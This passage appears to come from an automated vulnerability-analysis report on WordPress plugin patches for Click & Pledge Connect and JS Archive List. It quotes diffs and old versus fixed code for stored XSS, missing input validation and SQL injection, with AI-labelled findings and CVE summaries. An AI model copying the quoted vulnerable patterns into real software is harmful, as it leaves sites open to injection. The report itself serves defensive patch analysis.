								   <td><a href="admin.php?page=cnp_channeldetails&cnpviewid='.$cnpform_id.'""><span class="dashicons dashicons-visibility"></span></a> |  <a href="admin.php?page=cnps_addchannel&act=edit&cnpviewid='.$cnpform_id.'""><span class="dashicons dashicons-edit"></span></a> |  <a href="admin.php?page=cnp_pledgetvchannelsdetails&info=del&did='.$cnpform_id.'" ><span class="dashicons dashicons-trash"></span></a></td></tr>';
```
Fixed Code:  
```php
$gname = esc_html($cnpformData->cnpchannelgrp_groupname);
$account = esc_html($cnpformData->cnpstngs_AccountNumber);
```
```php
$cnpresltdsply .= '<tr>
            <td>' . esc_html($gname) . '</td>
            <td>' . esc_html($account) . '</td>
            <td>' . esc_html($frmshrtcode) . '</td>
            <td data-sort="' . strtotime($frmstrtddt) . '">' . $stdate->format(CFCNP_PLUGIN_CURRENTDATETIMEFORMATPHP) . '</td>
            <td>' . $nwenddt . '</td>
            <td align="center">' . esc_html($noofchannels) . '</td>
            <td data-sort="' . strtotime($frmmodifiddt) . '">' . $mddate->format(CFCNP_PLUGIN_CURRENTDATETIMEFORMATPHP) . '</td>
            <td><a href="admin.php?page=cnp_pledgetvchannelsdetails&cnpsts=' . esc_attr($frmsts) . '&cnpviewid=' . esc_attr($cnpform_id) . '">' . esc_html($frmsts) . '</a></td>
            <td>
                <a href="admin.php?page=cnp_channeldetails&cnpviewid=' . esc_attr($cnpform_id) . '"><span class="dashicons dashicons-visibility"></span></a> |
                <a href="admin.php?page=cnps_addchannel&act=edit&cnpviewid=' . esc_attr($cnpform_id) . '"><span class="dashicons dashicons-edit"></span></a> |
                <a href="admin.php?page=cnp_pledgetvchannelsdetails&info=del&did=' . esc_attr($cnpform_id) . '"><span class="dashicons dashicons-trash"></span></a>
            </td>
        </tr>';
```
Explanation:  
The old code directly output database values (`$gname`, `$account`, `$frmshrtcode`, `$frmsts`, `$cnpform_id`) into HTML without escaping, allowing stored XSS if malicious data is inserted into the database. The fixed code uses `esc_html()` for text content and `esc_attr()` for HTML attributes, neutralizing dangerous characters and preventing script injection.

Vulnerability Existed: yes  
TRUE POSITIVE
CWE-20: Improper Input Validation - cnptvchannelsDetails.php lines 2, 24, 37  
Old Code:  
```php
$info          = $_REQUEST["info"];
```
```php
$delid=$_GET["did"];
$wpdb->query("delete from ".$cnp_channelgrptable_name." where cnpchannelgrp_ID =".$delid);
```
```php
if(isset($_GET['cnpsts']) && $_GET['cnpsts']  !="")
{	
	$cnpstsrtnval = CNPCF_updateCnPstatus($cnp_channelgrptable_name,'cnpchannelgrp_status','cnpchannelgrp_ID',$_GET['cnpviewid'],$_GET['cnpsts']);
```
Fixed Code:  
```php
if (isset($_REQUEST["info"])) { $info = sanitize_text_field($_REQUEST["info"]); }
```
```php
$delid = isset($_GET['did']) ? intval($_GET['did']) : 0;
if ($delid > 0) {
    $deleted = $wpdb->query($wpdb->prepare("DELETE FROM $cnp_channelgrptable_name WHERE cnpchannelgrp_ID = %d", $delid));
```
```php
if (isset($_GET['cnpsts']) && !empty($_GET['cnpsts'])) {
    $cnpsts = sanitize_text_field($_GET['cnpsts']);
    $cnpviewid = isset($_GET['cnpviewid']) ? intval($_GET['cnpviewid']) : 0;
    if ($cnpviewid > 0 && in_array($cnpsts, ['active', 'inactive'], true)) {
        $cnpstsrtnval = CNPCF_updateCnPstatus($cnp_channelgrptable_name, 'cnpchannelgrp_status', 'cnpchannelgrp_ID', $cnpviewid, $cnpsts);
```
Explanation:  
The old code lacked input validation: `$_REQUEST["info"]` was used unsanitized, `$_GET['did']` and `$_GET['cnpviewid']` were not checked for existence or type, and `$_GET['cnpsts']` had no validation for allowed values. The fixed code adds checks with `isset()`, uses `intval()` for IDs, `sanitize_text_field()` for text, and `in_array()` to restrict status values, preventing invalid or malicious input from causing errors or security issues.

CVE Analysis Results:

CVE-2025-32550: Yes

View CVE Description

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in ClickandPledge Click & Pledge Connect Plugin allows SQL Injection. This issue affects Click & Pledge Connect Plugin: from 2.24080000 through WP6.6.1.

[CVE-2025-54726] [JS Archive List: 6.1.5→6.1.6] classes/class-jq-archive-list-datasource.php AI: 4 vulnerabilities 4 true positives CVE-2025-54726

--- cache/jquery-archive-list-widget_6.1.5/classes/class-jq-archive-list-datasource.php	2025-12-04 14:06:22.160252868 +0000+++ cache/jquery-archive-list-widget_6.1.6/classes/class-jq-archive-list-datasource.php	2025-12-04 14:05:29.716886575 +0000@@ -1,142 +1,186 @@ <?php+declare(strict_types=1); defined( 'ABSPATH' ) or die( 'No script kiddies please!' );  /**  * Class to load required information from DB.+ *+ * @property array $config Configuration options for data source+ * @property bool $legacy Legacy mode flag  */ class JQ_Archive_List_DataSource {-	public $config;-	public $legacy;--	public function __construct( $config = [], $legacy = false ) {-		$this->config = $config;-		$this->legacy = $legacy;-	}--	public function get_years() {-		global $wpdb;-		$sql = sprintf(-			'SELECT JAL.year, COUNT(JAL.ID) as `posts` FROM (-		       		SELECT DISTINCT YEAR(post_date) AS `year`, ID-					FROM  %s %s %s) JAL-				GROUP BY JAL.year ORDER BY JAL.year DESC',-			$wpdb->posts,-			$this->build_sql_join(),-			$this->build_sql_where()-		);--		return $wpdb->get_results( $sql );-	}--	protected function build_sql_join() {-		global $wpdb;--		$join = '';--		if ( $this->has_filtering_categories() || $this->only_show_cur_category() ) {-			$join = sprintf( ' LEFT JOIN %s ON(%s.ID = %s.object_id)',-				$wpdb->term_relationships, $wpdb->posts, $wpdb->term_relationships-			);--			$join .= sprintf( ' LEFT JOIN %s ON(%s.term_taxonomy_id = %s.term_taxonomy_id)',-				$wpdb->term_taxonomy, $wpdb->term_relationships, $wpdb->term_taxonomy-			);-		}--		return apply_filters( 'getarchives_join', $join, [] );-	}--	/**-	 * Check if user selected categories for inclusion or exclusion.-	 *-	 * @return bool If there are saved categories for including/excluding.-	 */-	private function has_filtering_categories() {-		return ! empty( $this->config['included'] ) || ! empty( $this->config['excluded'] );-	}--	/**-	 * Returns if the option to show only current categories-	 * was selected and current page is a category page.-	 *-	 * @return bool Show only current category.-	 */-	private function only_show_cur_category() {-		return ! empty( $this->config['onlycategory'] );-	}--	protected function build_sql_where( $year = null, $month = null ) {-		global $wpdb;--		$where = sprintf( 'WHERE post_title != \'\' AND post_type = \'%s\' AND post_status = \'publish\' ', $this->config['type'] );--		if ( $year ) {-			$where .= sprintf( 'AND YEAR(post_date) = %s ', $year );-		}--		if ( $month ) {-			$where .= sprintf( 'AND MONTH(post_date) = %s ', $month );-		}--		if ( ! empty( $this->config['included'] ) ) {-			$ids   = is_array( $this->config['included'] ) ? implode( ',', $this->config['included'] ) : $this->config['included'];-			$where .= sprintf( 'AND %s.term_id IN (%s)', $wpdb->term_taxonomy, $ids );-		} elseif ( ! empty( $this->config['excluded'] ) ) {-			$ids   = is_array( $this->config['excluded'] ) ? implode( ',', $this->config['excluded'] ) : $this->config['excluded'];-			$where .= sprintf( 'AND %s.term_id NOT IN (%s)', $wpdb->term_taxonomy, $ids );-		}--		if ( $this->only_show_cur_category() ) {-			// Leave config when removing legacy code.-			$query_cat      = get_query_var( 'cat' );-			$categories_ids = empty( $query_cat ) ? $this->config['onlycategory'] : $query_cat;--			if ( ( $this->legacy && is_category() || ! $this->legacy ) ) {-				$where .= sprintf( 'AND %s.term_id IN (%s) ', $wpdb->term_taxonomy, $categories_ids );-			}-		}--		if ( $this->has_filtering_categories() || $this->only_show_cur_category() ) {-			$where .= 'AND ' . $wpdb->term_taxonomy . '.taxonomy=\'category\' ';-		}--		return apply_filters( 'getarchives_where', $where, [] );-	}--	public function get_posts( $year, $month ) {-		global $wpdb;--		if ( empty( $year ) || empty( $month ) ) {-			return null;-		}--		$sort     = isset( $this->config['sort'] ) ? $this->config['sort'] : 'date_desc';-		$order_by = explode( '_', $sort );--		return $wpdb->get_results( sprintf(-			'SELECT DISTINCT ID, post_title, post_name, post_date, "false" as expanded FROM %s %s %s ORDER BY %s %s',-			$wpdb->posts, $this->build_sql_join(), $this->build_sql_where( $year, $month ),-			$this->query_val_to_field_name( $order_by[0] ),-			$order_by[1]-		) );-	}--	/**-	 * Maps the query value to the correct DB field.-	 *-	 * @param string $query_value received field name from the frontend.-	 *-	 * @return string DB field name.-	 */-	private function query_val_to_field_name( $query_value ): string {-		$map = [-			'id'   => 'ID',-			'name' => 'post_title',-			'date' => 'post_date',-		];--		return $map[ $query_value ];-	}+    /**+     * @var array Configuration options+     */+    private $config;+    /**+     * @var bool Legacy mode flag+     */+    private $legacy;++    /**+     * Constructor+     *+     * @param array $config+     * @param bool $legacy+     */+    public function __construct(array $config = [], bool $legacy = false) {+        $this->config = $config;+        $this->legacy = $legacy;+    }++    /**+     * Get years and post counts+     *+     * @return array|null+     */+    public function get_years(): ?array {+        global $wpdb;++        list($where_clause, $where_args) = $this->build_sql_where();++        $sql = "SELECT JAL.year, COUNT(JAL.ID) as `posts` FROM (+                SELECT DISTINCT YEAR(post_date) AS `year`, ID+                FROM  {$wpdb->posts} {$this->build_sql_join()} WHERE {$where_clause}) JAL+            GROUP BY JAL.year ORDER BY JAL.year DESC";++        $results = $wpdb->get_results($wpdb->prepare($sql, ...$where_args));+        return is_array($results) ? $results : null;+    }++    /**+     * Build SQL JOIN clause+     *+     * @return string+     */+    protected function build_sql_join(): string {+        global $wpdb;+        $join = '';+        if ($this->has_filtering_categories() || $this->only_show_cur_category()) {+            $join = sprintf(' LEFT JOIN %s ON(%s.ID = %s.object_id)',+                $wpdb->term_relationships, $wpdb->posts, $wpdb->term_relationships+            );+            $join .= sprintf(' LEFT JOIN %s ON(%s.term_taxonomy_id = %s.term_taxonomy_id)',+                $wpdb->term_taxonomy, $wpdb->term_relationships, $wpdb->term_taxonomy+            );+        }+        return apply_filters('getarchives_join', $join, []);+    }++    /**+     * Check if user selected categories for inclusion or exclusion.+     *+     * @return bool+     */+    private function has_filtering_categories(): bool {+        return !empty($this->config['included']) || !empty($this->config['excluded']);+    }++    /**+     * Returns if the option to show only current categories was selected and current page is a category page.+     *+     * @return bool+     */+    private function only_show_cur_category(): bool {+        return !empty($this->config['onlycategory']);+    }++    /**+     * Build SQL WHERE clause+     *+     * @param int|null $year+     * @param int|null $month+     * @return array+     */+    protected function build_sql_where(?int $year = null, ?int $month = null): array {+        global $wpdb;+        $where_parts  = [];+        $prepare_args = [];+        $where_parts[] = 'post_title != %s';+        $prepare_args[] = '';+        $where_parts[] = 'post_type = %s';+        $prepare_args[] = $this->config['type'] ?? 'post';+        $where_parts[] = 'post_status = %s';+        $prepare_args[] = 'publish';+        if ($year) {+            $where_parts[] = 'YEAR(post_date) = %d';+            $prepare_args[] = $year;+        }+        if ($month) {+            $where_parts[] = 'MONTH(post_date) = %d';+            $prepare_args[] = $month;+        }+        $ids_key = !empty($this->config['included']) ? 'included' : (!empty($this->config['excluded']) ? 'excluded' : null);+        if ($ids_key) {+            $ids = is_array($this->config[$ids_key]) ? $this->config[$ids_key] : explode(',', $this->config[$ids_key]);+            $ids = array_map('intval', $ids);+            $placeholders = implode(', ', array_fill(0, count($ids), '%d'));+            $operator = $ids_key === 'included' ? 'IN' : 'NOT IN';+            $where_parts[] = sprintf('%s.term_id %s (%s)', $wpdb->term_taxonomy, $operator, $placeholders);+            $prepare_args = array_merge($prepare_args, $ids);+        }+        if ($this->only_show_cur_category()) {+            $query_cat = get_query_var('cat');+            $categories_ids = empty($query_cat) ? $this->config['onlycategory'] : $query_cat;+            $categories_ids = is_array($categories_ids) ? $categories_ids : explode(',', $categories_ids);+            $categories_ids = array_map('intval', $categories_ids);+            if (($this->legacy && is_category()) || !$this->legacy) {+                $placeholders = implode(', ', array_fill(0, count($categories_ids), '%d'));+                $where_parts[] = sprintf('%s.term_id IN (%s)', $wpdb->term_taxonomy, $placeholders);+                $prepare_args = array_merge($prepare_args, $categories_ids);+            }+        }+        if ($this->has_filtering_categories() || $this->only_show_cur_category()) {+            $where_parts[] = $wpdb->term_taxonomy . '.taxonomy=%s';+            $prepare_args[] = 'category';+        }+        $where_clause_fragment = implode(' AND ', $where_parts);+        $where_clause_fragment = apply_filters('getarchives_where', $where_clause_fragment, []);+        return [$where_clause_fragment, $prepare_args];+    }++    /**+     * Get posts for a given year and month+     *+     * @param int $year+     * @param int $month+     * @return array|null+     */+    public function get_posts(int $year, int $month): ?array {+        global $wpdb;+        if ($year <= 0 || $month <= 0 || $month > 12) {+            return null;+        }+        $sort = $this->config['sort'] ?? 'date_desc';+        $order_by = explode('_', $sort);+        $order_direction = strtoupper($order_by[1] ?? 'DESC');+        if (!in_array($order_direction, ['ASC', 'DESC'], true)) {+            $order_direction = 'DESC';+        }+        list($where_clause, $where_args) = $this->build_sql_where( $year, $month);+        $order_field = $this->query_val_to_field_name($order_by[0] ?? 'date');+        $sql = "SELECT DISTINCT ID, post_title, post_name, post_date, 'false' as expanded FROM {$wpdb->posts} {$this->build_sql_join()} WHERE {$where_clause} ORDER BY {$order_field} {$order_direction}";+        $results = $wpdb->get_results($wpdb->prepare($sql, ...$where_args));+        return is_array($results) ? $results : null;+    }++    /**+     * Maps the query value to the correct DB field.+     *+     * @param string $query_value+     * @return string+     */+    protected function query_val_to_field_name(string $query_value): string {+        switch ($query_value) {+            case 'title':+                return 'post_title';+            case 'name':+                return 'post_name';+            case 'date':+            default:+                return 'post_date';+        }+    }  	public function year_should_be_expanded( $year, $cur_post_year, $cur_post_month, $expandConfig ): bool { 		$months   = $this->get_months( $year );@@ -160,13 +204,13 @@  	public function get_months( $year ) { 		global $wpdb;+        list($where_clause, $where_args) = $this->build_sql_where(intval($year));+        $sql = "SELECT JAL.year, JAL.month, COUNT(JAL.ID) as `posts` FROM (+                SELECT DISTINCT YEAR(post_date) AS `year`, MONTH(post_date) AS `month`, ID+                FROM {$wpdb->posts} {$this->build_sql_join()} WHERE {$where_clause}) JAL+            GROUP BY JAL.year, JAL.month ORDER BY JAL.year, JAL.month DESC"; -		return $wpdb->get_results( sprintf(-			'SELECT JAL.year, JAL.month, COUNT(JAL.ID) as `posts` FROM (-					SELECT DISTINCT YEAR(post_date) AS `year`, MONTH(post_date) AS `month`,ID FROM %s %s %s)-				JAL GROUP BY JAL.year, JAL.month ORDER BY JAL.year,JAL.month DESC',-			$wpdb->posts, $this->build_sql_join(), $this->build_sql_where( $year )-		) );+        return $wpdb->get_results($wpdb->prepare($sql, ...$where_args)); 	}  }

AI Analysis

Vulnerability Existed: yes  
TRUE POSITIVE
CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') - classes/class-jq-archive-list-datasource.php [Lines 39-44, 94-136, 159-161, 204-210]  
Old Code:  
```php
$sql = sprintf(
    'SELECT JAL.year, COUNT(JAL.ID) as `posts` FROM (
            SELECT DISTINCT YEAR(post_date) AS `year`, ID
            FROM  %s %s %s) JAL
        GROUP BY JAL.year ORDER BY JAL.year DESC',
    $wpdb->posts,
    $this->build_sql_join(),
    $this->build_sql_where()
);
return $wpdb->get_results( $sql );
```  
Fixed Code:  
```php
list($where_clause, $where_args) = $this->build_sql_where();
$sql = "SELECT JAL.year, COUNT(JAL.ID) as `posts` FROM (
        SELECT DISTINCT YEAR(post_date) AS `year`, ID
        FROM  {$wpdb->posts} {$this->build_sql_join()} WHERE {$where_clause}) JAL
    GROUP BY JAL.year ORDER BY JAL.year DESC";
$results = $wpdb->get_results($wpdb->prepare($sql, ...$where_args));
return is_array($results) ? $results : null;
```  
Explanation:  
The old code directly concatenated user-controlled values (like `$this->config['included']`, `$this->config['excluded']`, `$this->config['type']`, etc.) into SQL strings using `sprintf()`, which could lead to SQL injection if those values contain malicious SQL fragments. The new code uses `$wpdb->prepare()` with parameterized queries, ensuring proper escaping and neutralization of special elements.

---

Vulnerability Existed: yes  
TRUE POSITIVE
CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') - classes/class-jq-archive-list-datasource.php [Lines 94-136]  
Old Code:  
```php
$where = sprintf( 'WHERE post_title != \'\' AND post_type = \'%s\' AND post_status = \'publish\' ', $this->config['type'] );
if ( $year ) {
    $where .= sprintf( 'AND YEAR(post_date) = %s ', $year );
}
if ( $month ) {
    $where .= sprintf( 'AND MONTH(post_date) = %s ', $month );
}
if ( ! empty( $this->config['included'] ) ) {
    $ids   = is_array( $this->config['included'] ) ? implode( ',', $this->config['included'] ) : $this->config['included'];
    $where .= sprintf( 'AND %s.term_id IN (%s)', $wpdb->term_taxonomy, $ids );
} elseif ( ! empty( $this->config['excluded'] ) ) {
    $ids   = is_array( $this->config['excluded'] ) ? implode( ',', $this->config['excluded'] ) : $this->config['excluded'];
    $where .= sprintf( 'AND %s.term_id NOT IN (%s)', $wpdb->term_taxonomy, $ids );
}
```  
Fixed Code:  
```php
$where_parts  = [];
$prepare_args = [];
$where_parts[] = 'post_title != %s';
$prepare_args[] = '';
$where_parts[] = 'post_type = %s';
$prepare_args[] = $this->config['type'] ?? 'post';
$where_parts[] = 'post_status = %s';
$prepare_args[] = 'publish';
if ($year) {
    $where_parts[] = 'YEAR(post_date) = %d';
    $prepare_args[] = $year;
}
if ($month) {
    $where_parts[] = 'MONTH(post_date) = %d';
    $prepare_args[] = $month;
}
$ids_key = !empty($this->config['included']) ? 'included' : (!empty($this->config['excluded']) ? 'excluded' : null);
if ($ids_key) {
    $ids = is_array($this->config[$ids_key]) ? $this->config[$ids_key] : explode(',', $this->config[$ids_key]);
    $ids = array_map('intval', $ids);
    $placeholders = implode(', ', array_fill(0, count($ids), '%d'));
    $operator = $ids_key === 'included' ? 'IN' : 'NOT IN';
    $where_parts[] = sprintf('%s.term_id %s (%s)', $wpdb->term_taxonomy, $operator, $placeholders);
    $prepare_args = array_merge($prepare_args, $ids);
}
```  
Explanation:  
The old code directly embedded user-controlled values (like `$this->config['type']`, `$year`, `$month`, and category IDs) into the SQL string without proper escaping, making it vulnerable to SQL injection. The new code constructs an array of parameterized conditions (`$where_parts`) and corresponding arguments (`$prepare_args`), then uses `$wpdb->prepare()` to safely bind the arguments. Additionally, it sanitizes category IDs with `intval()`.

---

Vulnerability Existed: yes  
TRUE POSITIVE
CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') - classes/class-jq-archive-list-datasource.php [Lines 159-161]  
Old Code:  
```php
return $wpdb->get_results( sprintf(
    'SELECT DISTINCT ID, post_title, post_name, post_date, "false" as expanded FROM %s %s %s ORDER BY %s %s',
    $wpdb->posts, $this->build_sql_join(), $this->build_sql_where( $year, $month ),
    $this->query_val_to_field_name( $order_by[0] ),
    $order_by[1]
) );
```  
Fixed Code:  
```php
list($where_clause, $where_args) = $this->build_sql_where( $year, $month);
$order_field = $this->query_val_to_field_name($order_by[0] ?? 'date');
$sql = "SELECT DISTINCT ID, post_title, post_name, post_date, 'false' as expanded FROM {$wpdb->posts} {$this->build_sql_join()} WHERE {$where_clause} ORDER BY {$order_field} {$order_direction}";
$results = $wpdb->get_results($wpdb->prepare($sql, ...$where_args));
return is_array($results) ? $results : null;
```  
Explanation:  
The old code used `sprintf()` to directly insert user-controlled values (from `$this->build_sql_where()` and `$order_by[1]`) into the SQL string, which could allow SQL injection. The new code uses parameterized queries via `$wpdb->prepare()` for the WHERE clause and validates `$order_direction` to ensure it's only 'ASC' or 'DESC', preventing injection through the ORDER BY clause.

---

Vulnerability Existed: yes  
TRUE POSITIVE
CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') - classes/class-jq-archive-list-datasource.php [Lines 204-210]  
Old Code:  
```php
return $wpdb->get_results( sprintf(
    'SELECT JAL.year, JAL.month, COUNT(JAL.ID) as `posts` FROM (
            SELECT DISTINCT YEAR(post_date) AS `year`, MONTH(post_date) AS `month`,ID FROM %s %s %s)
        JAL GROUP BY JAL.year, JAL.month ORDER BY JAL.year,JAL.month DESC',
    $wpdb->posts, $this->build_sql_join(), $this->build_sql_where( $year )
) );
```  
Fixed Code:  
```php
list($where_clause, $where_args) = $this->build_sql_where(intval($year));
$sql = "SELECT JAL.year, JAL.month, COUNT(JAL.ID) as `posts` FROM (
        SELECT DISTINCT YEAR(post_date) AS `year`, MONTH(post_date) AS `month`, ID
        FROM {$wpdb->posts} {$this->build_sql_join()} WHERE {$where_clause}) JAL
    GROUP BY JAL.year, JAL.month ORDER BY JAL.year, JAL.month DESC";
return $wpdb->get_results($wpdb->prepare($sql, ...$where_args));
```  
Explanation:  
The old code concatenated the output of `$this->build_sql_where()` (which contained unsanitized user input) directly into the SQL string via `sprintf()`, creating an SQL injection risk. The new code uses `$wpdb->prepare()` with parameterized arguments to safely bind values, and also ensures `$year` is cast to an integer with `intval()` for additional safety.

CVE Analysis Results:

CVE-2025-54726: Yes

View CVE Description

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Miguel Useche JS Archive List allows SQL Injection. This issue affects JS Archive List: from n/a through n/a.

[CVE-2025-7670] [JS Archive List: 6.1.5→6.1.6] classes/class-jq-archive-list-datasource.php AI: 5 vulnerabilities 5 true positives CVE-2025-7670

--- cache/jquery-archive-list-widget_6.1.5/classes/class-jq-archive-list-datasource.php	2025-12-04 14:05:27.380736617 +0000+++ cache/jquery-archive-list-widget_6.1.6/classes/class-jq-archive-list-datasource.php	2025-12-04 14:05:29.716886575 +0000@@ -1,142 +1,186 @@ <?php+declare(strict_types=1); defined( 'ABSPATH' ) or die( 'No script kiddies please!' );  /**  * Class to load required information from DB.+ *+ * @property array $config Configuration options for data source+ * @property bool $legacy Legacy mode flag  */ class JQ_Archive_List_DataSource {-	public $config;-	public $legacy;--	public function __construct( $config = [], $legacy = false ) {-		$this->config = $config;-		$this->legacy = $legacy;-	}--	public function get_years() {-		global $wpdb;-		$sql = sprintf(-			'SELECT JAL.year, COUNT(JAL.ID) as `posts` FROM (-		       		SELECT DISTINCT YEAR(post_date) AS `year`, ID-					FROM  %s %s %s) JAL-				GROUP BY JAL.year ORDER BY JAL.year DESC',-			$wpdb->posts,-			$this->build_sql_join(),-			$this->build_sql_where()-		);--		return $wpdb->get_results( $sql );-	}--	protected function build_sql_join() {-		global $wpdb;--		$join = '';--		if ( $this->has_filtering_categories() || $this->only_show_cur_category() ) {-			$join = sprintf( ' LEFT JOIN %s ON(%s.ID = %s.object_id)',-				$wpdb->term_relationships, $wpdb->posts, $wpdb->term_relationships-			);--			$join .= sprintf( ' LEFT JOIN %s ON(%s.term_taxonomy_id = %s.term_taxonomy_id)',-				$wpdb->term_taxonomy, $wpdb->term_relationships, $wpdb->term_taxonomy-			);-		}--		return apply_filters( 'getarchives_join', $join, [] );-	}--	/**-	 * Check if user selected categories for inclusion or exclusion.-	 *-	 * @return bool If there are saved categories for including/excluding.-	 */-	private function has_filtering_categories() {-		return ! empty( $this->config['included'] ) || ! empty( $this->config['excluded'] );-	}--	/**-	 * Returns if the option to show only current categories-	 * was selected and current page is a category page.-	 *-	 * @return bool Show only current category.-	 */-	private function only_show_cur_category() {-		return ! empty( $this->config['onlycategory'] );-	}--	protected function build_sql_where( $year = null, $month = null ) {-		global $wpdb;--		$where = sprintf( 'WHERE post_title != \'\' AND post_type = \'%s\' AND post_status = \'publish\' ', $this->config['type'] );--		if ( $year ) {-			$where .= sprintf( 'AND YEAR(post_date) = %s ', $year );-		}--		if ( $month ) {-			$where .= sprintf( 'AND MONTH(post_date) = %s ', $month );-		}--		if ( ! empty( $this->config['included'] ) ) {-			$ids   = is_array( $this->config['included'] ) ? implode( ',', $this->config['included'] ) : $this->config['included'];-			$where .= sprintf( 'AND %s.term_id IN (%s)', $wpdb->term_taxonomy, $ids );-		} elseif ( ! empty( $this->config['excluded'] ) ) {-			$ids   = is_array( $this->config['excluded'] ) ? implode( ',', $this->config['excluded'] ) : $this->config['excluded'];-			$where .= sprintf( 'AND %s.term_id NOT IN (%s)', $wpdb->term_taxonomy, $ids );-		}--		if ( $this->only_show_cur_category() ) {-			// Leave config when removing legacy code.-			$query_cat      = get_query_var( 'cat' );-			$categories_ids = empty( $query_cat ) ? $this->config['onlycategory'] : $query_cat;--			if ( ( $this->legacy && is_category() || ! $this->legacy ) ) {-				$where .= sprintf( 'AND %s.term_id IN (%s) ', $wpdb->term_taxonomy, $categories_ids );-			}-		}--		if ( $this->has_filtering_categories() || $this->only_show_cur_category() ) {-			$where .= 'AND ' . $wpdb->term_taxonomy . '.taxonomy=\'category\' ';-		}--		return apply_filters( 'getarchives_where', $where, [] );-	}--	public function get_posts( $year, $month ) {-		global $wpdb;--		if ( empty( $year ) || empty( $month ) ) {-			return null;-		}--		$sort     = isset( $this->config['sort'] ) ? $this->config['sort'] : 'date_desc';-		$order_by = explode( '_', $sort );--		return $wpdb->get_results( sprintf(-			'SELECT DISTINCT ID, post_title, post_name, post_date, "false" as expanded FROM %s %s %s ORDER BY %s %s',-			$wpdb->posts, $this->build_sql_join(), $this->build_sql_where( $year, $month ),-			$this->query_val_to_field_name( $order_by[0] ),-			$order_by[1]-		) );-	}--	/**-	 * Maps the query value to the correct DB field.-	 *-	 * @param string $query_value received field name from the frontend.-	 *-	 * @return string DB field name.-	 */-	private function query_val_to_field_name( $query_value ): string {-		$map = [-			'id'   => 'ID',-			'name' => 'post_title',-			'date' => 'post_date',-		];--		return $map[ $query_value ];-	}+    /**+     * @var array Configuration options+     */+    private $config;+    /**+     * @var bool Legacy mode flag+     */+    private $legacy;++    /**+     * Constructor+     *+     * @param array $config+     * @param bool $legacy+     */+    public function __construct(array $config = [], bool $legacy = false) {+        $this->config = $config;+        $this->legacy = $legacy;+    }++    /**+     * Get years and post counts+     *+     * @return array|null+     */+    public function get_years(): ?array {+        global $wpdb;++        list($where_clause, $where_args) = $this->build_sql_where();++        $sql = "SELECT JAL.year, COUNT(JAL.ID) as `posts` FROM (+                SELECT DISTINCT YEAR(post_date) AS `year`, ID+                FROM  {$wpdb->posts} {$this->build_sql_join()} WHERE {$where_clause}) JAL+            GROUP BY JAL.year ORDER BY JAL.year DESC";++        $results = $wpdb->get_results($wpdb->prepare($sql, ...$where_args));+        return is_array($results) ? $results : null;+    }++    /**+     * Build SQL JOIN clause+     *+     * @return string+     */+    protected function build_sql_join(): string {+        global $wpdb;+        $join = '';+        if ($this->has_filtering_categories() || $this->only_show_cur_category()) {+            $join = sprintf(' LEFT JOIN %s ON(%s.ID = %s.object_id)',+                $wpdb->term_relationships, $wpdb->posts, $wpdb->term_relationships+            );+            $join .= sprintf(' LEFT JOIN %s ON(%s.term_taxonomy_id = %s.term_taxonomy_id)',+                $wpdb->term_taxonomy, $wpdb->term_relationships, $wpdb->term_taxonomy+            );+        }+        return apply_filters('getarchives_join', $join, []);+    }++    /**+     * Check if user selected categories for inclusion or exclusion.+     *+     * @return bool+     */+    private function has_filtering_categories(): bool {+        return !empty($this->config['included']) || !empty($this->config['excluded']);+    }++    /**+     * Returns if the option to show only current categories was selected and current page is a category page.+     *+     * @return bool+     */+    private function only_show_cur_category(): bool {+        return !empty($this->config['onlycategory']);+    }++    /**+     * Build SQL WHERE clause+     *+     * @param int|null $year+     * @param int|null $month+     * @return array+     */+    protected function build_sql_where(?int $year = null, ?int $month = null): array {+        global $wpdb;+        $where_parts  = [];+        $prepare_args = [];+        $where_parts[] = 'post_title != %s';+        $prepare_args[] = '';+        $where_parts[] = 'post_type = %s';+        $prepare_args[] = $this->config['type'] ?? 'post';+        $where_parts[] = 'post_status = %s';+        $prepare_args[] = 'publish';+        if ($year) {+            $where_parts[] = 'YEAR(post_date) = %d';+            $prepare_args[] = $year;+        }+        if ($month) {+            $where_parts[] = 'MONTH(post_date) = %d';+            $prepare_args[] = $month;+        }+        $ids_key = !empty($this->config['included']) ? 'included' : (!empty($this->config['excluded']) ? 'excluded' : null);+        if ($ids_key) {+            $ids = is_array($this->config[$ids_key]) ? $this->config[$ids_key] : explode(',', $this->config[$ids_key]);+            $ids = array_map('intval', $ids);+            $placeholders = implode(', ', array_fill(0, count($ids), '%d'));+            $operator = $ids_key === 'included' ? 'IN' : 'NOT IN';+            $where_parts[] = sprintf('%s.term_id %s (%s)', $wpdb->term_taxonomy, $operator, $placeholders);+            $prepare_args = array_merge($prepare_args, $ids);+        }+        if ($this->only_show_cur_category()) {+            $query_cat = get_query_var('cat');+            $categories_ids = empty($query_cat) ? $this->config['onlycategory'] : $query_cat;+            $categories_ids = is_array($categories_ids) ? $categories_ids : explode(',', $categories_ids);+            $categories_ids = array_map('intval', $categories_ids);+            if (($this->legacy && is_category()) || !$this->legacy) {+                $placeholders = implode(', ', array_fill(0, count($categories_ids), '%d'));+                $where_parts[] = sprintf('%s.term_id IN (%s)', $wpdb->term_taxonomy, $placeholders);+                $prepare_args = array_merge($prepare_args, $categories_ids);+            }+        }+        if ($this->has_filtering_categories() || $this->only_show_cur_category()) {+            $where_parts[] = $wpdb->term_taxonomy . '.taxonomy=%s';+            $prepare_args[] = 'category';+        }+        $where_clause_fragment = implode(' AND ', $where_parts);+        $where_clause_fragment = apply_filters('getarchives_where', $where_clause_fragment, []);+        return [$where_clause_fragment, $prepare_args];+    }++    /**+     * Get posts for a given year and month+     *+     * @param int $year+     * @param int $month+     * @return array|null+     */+    public function get_posts(int $year, int $month): ?array {+        global $wpdb;+        if ($year <= 0 || $month <= 0 || $month > 12) {+            return null;+        }+        $sort = $this->config['sort'] ?? 'date_desc';+        $order_by = explode('_', $sort);+        $order_direction = strtoupper($order_by[1] ?? 'DESC');+        if (!in_array($order_direction, ['ASC', 'DESC'], true)) {+            $order_direction = 'DESC';+        }+        list($where_clause, $where_args) = $this->build_sql_where( $year, $month);+        $order_field = $this->query_val_to_field_name($order_by[0] ?? 'date');+        $sql = "SELECT DISTINCT ID, post_title, post_name, post_date, 'false' as expanded FROM {$wpdb->posts} {$this->build_sql_join()} WHERE {$where_clause} ORDER 